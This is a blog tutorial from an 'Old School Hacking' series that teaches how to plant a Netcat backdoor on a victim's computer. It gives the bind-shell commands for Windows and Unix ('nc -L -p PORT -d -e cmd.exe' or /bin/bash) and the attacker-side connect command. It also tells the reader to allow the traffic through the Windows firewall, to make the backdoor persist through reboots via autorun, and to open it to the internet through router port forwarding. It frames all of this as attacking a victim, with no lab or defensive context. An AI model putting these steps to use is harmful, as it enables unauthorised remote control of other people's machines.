Want to be an elite hacker, but don't know where to begin?? MyPrivateVoid() takes you back to basics with our Old School Hacking series of Tutorials.
For our first tutorial, we will show you how to install a simple backdoor on nearly any system using Netcat's dead-simple shell binding functionality.
Background:
What is a backdoor?
A backdoor is "a method of bypassing normal authentication, securing remote access to a computer"
What tools will we be using?
Netcat - a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is the "Swiss Army Knife of TCP/IP" (Wikipedia Description)
Netcat is preinstalled on almost all Unix/BSD variants (Mac OSX and Linux) and is available for Windows.
Prerequisites:
You must have command line access to the computer on which you wish to install the backdoor.
If you wish to be able to access the backdoor from someplace other than the local network (across the internet) then you need access to the victim's router configurations.
And now, without further ado, LET'S HACK THE GIBSON!
The Procedure:
If the intended victim's computer is running Windows, start at Step 1, otherwise, skip to Step 2
Step 1) Download Netcat for Windows and extract it to a location on the victim's computer that is in the system path. (I use C:\Windows\)
Step 2) On the victim computer, from the command line, type:
nc -L -p PORT -d -e PATH_TO_SHELL
PORT can be any port number that is not already assigned to another service, try something in the 10000-99999 range
PATH_TO_SHELL is the location of the shell executable that will be bound to the port.
In Windows, this would simply be: cmd.exe
In Linux or Mac, this might be something like: /bin/bash (can be found by typing: which bash)
Usage Example:
nc -L -p 49127 -d -e cmd.exe
This command causes Netcat to run in the background, as it own process.. so you can close the terminal window and it will continue to run!
Netcat is now listening for any incoming connection on port 49127 and binding it to the specified executable, which in this case, is the Windows "shell"
Windows computers will often throw up a window asking if you would like to allow the Windows Firewall to let traffic from nc.exe through... Make sure to permanently allow traffic on all networks, public and private.
Step 3) On your computer (which should have Netcat installed and be on the same network as the victim) type into your terminal:
nc -v -n IP_ADDRESS PORT
IP_ADDRESS is the local IP address of the victim's computer... duh!
PORT is the port you specified in Step 2
Usage Example:
nc -v -n 192.168.1.100 49127
Voila! If you did everything correctly, you should now have remote shell access to the victim's computer!!!
(You will have the same access permissions as whatever user happens to be logged on at the time)
Extending this Tutorial
Make this backdoor persist a system shutdown or reboot: Append the command you ran in Step 2 to the autorun script of the particular OS you are working with. (Google is your friend!)
Make the remote shell accessible from any computer (not just those on the LAN): Access the victim's router and add a port forwarding rule which forwards the port you selected in Step 2 to the IP Address of the victim's computer. Once this is done, you will be able to access the remote shell from anywhere by just replacing their LAN IP Address with their external IP Address in the Netcat command.
*Interesting Side Note: Android has Netcat built into it... Mobile Hacking FTW!
Have fun!
__________________________________________
No comments:
Post a Comment